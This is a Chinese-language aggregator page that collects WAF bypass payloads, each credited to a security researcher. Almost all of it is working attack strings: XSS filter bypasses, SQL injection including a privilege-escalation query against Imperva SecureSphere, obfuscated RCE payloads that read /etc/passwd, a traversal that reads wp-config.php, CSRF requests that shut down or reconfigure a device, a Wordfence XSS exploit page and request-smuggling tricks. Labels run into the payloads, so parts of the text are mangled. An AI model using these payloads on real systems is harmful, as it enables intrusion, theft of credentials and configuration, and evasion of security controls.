<iframe/onload='this["src"]="javas	cript:al"+"ert``"';><img/src=q onerror='new Function`alert`1``'>XSS Bypass by @c0d3g33k
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>SQLi Bypass by @DRK1WI
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'SQLi by @Giuseppe D’Amore
Stringindatasetchoosen%%' and 1 = any (SELEct 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and passworD like '0%') and '1%%'='1Imperva SecureSphere <= v13 - Privilege Escalation by @0x09ALHTML Injection by @sp1d3rs
%2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253EXSS Bypass by @Jonathan Bouman
<body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"XSS Bypass by @zseano
?"></script><base%20c%3D=href%3Dhttps:mysite>XSS Bypass by @0xInfection
<abc/onmouseenter=confirm%60%60>XSS Bypass by @sp1d3rs
%2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253EXSS Bypass by @Frans Rosén
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>XSS Bypass by @Ishaq MohAMMed
<marquee+loop=1+width=0+onfinish='new+Function`alert`1``'>GET Type CSRF Attack by @michael Brooks (>= v.2.6.2)
Turn off Proface Machine
<img src=https://host:2000/ajax.html?action=shutdown>Add a proxy
<img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>XSS Bypass by @michael Brooks (>= v.2.6.2)
https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookiE)</script>XSS Bypass by @EnableSecurity (>= v2.4)
%3CEvil%20script%20goes%20here%3E=%0AByPass%3Cscript%3Ealert(document.cookiE)%3C/script%20ByPass%3EXSS Bypass by @WAFNinja
?<input type="search" onsearch="aleru0074(1)"><details ontoggle=alert(1)>Smuggling RCE Payloads by @theMiddle
/???/??t+/???/??ss??ObfuscaTing RCE Payloads by @theMiddle
;+cat+/e'tc/pass'wdc\a\t+/et\c/pas\swdXSS Bypass by @Luka
"><input/onauxclick="[1].map(prompt)">XSS Bypass by @Brute Logic
data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post><input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>"><input type=submit></form>Directory Traversal by @ZeQ3uL (<= v3.1) (Only on ASP.NET)
http://host.com/test.asp?file=.%./bla.txtCross Site ScripTing by @0xInfection
<a69/onauxclick=open()>rightclickhereCross Site ScripTing by @WAFNinja
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image><marquee/onstart=confirm(2)><details ontoggle=alert(1)><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"><img src=x onwheel=prompt(1)>SQLi by @WAFNinja
0 union(SELEct 1,username,password from(users))0 union(SELEct 1,@@hostname,@@datadir)XSS Bypass by @Aatif Khan (v4.1)
<details ontoggle=alert(1)><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">SQLi Bypass by @ZeQ3uL
10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_scheR_7_11845@a.tables)XSS Bypass by @brute Logic
<a href=javascript:alert(1)>XSS Bypass by @0xInfection
<a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>clickHTML Injection by @Voxel
http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpXSS Exploit by @mustLive (>= v3.3.5)
<html><head><title>Wordfence Security XSS exploit (C) 2012 MustLive.http://websecurity.com.ua</title></head><body onLoad="document.hack.submit()"><form name="hack" action="http://site/?_wfsf=unlockEmail" method="post"><input type="hidden" name="email"value="<script>alert(document.cookiE)</script>"></form></body></html>Other XSS Bypasses
<meter onmouseover="alert(1)"'">><div><meter onmouseover="alert(1)"</div>">><marquee loop=1 width=0 onfinish=alert(1)>WriTing method type in lowercase by @i_bo0om
get /login http/1.1Host: favoritewaf.comUser-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)Tabs before method by @i_bo0om
GET /login.php http/1.1Host: favoritewaf.comUser-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)以上是大佬教程为你收集整理的干货|各种WAF绕过手法学习全部内容,希望文章能够帮你解决干货|各种WAF绕过手法学习所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。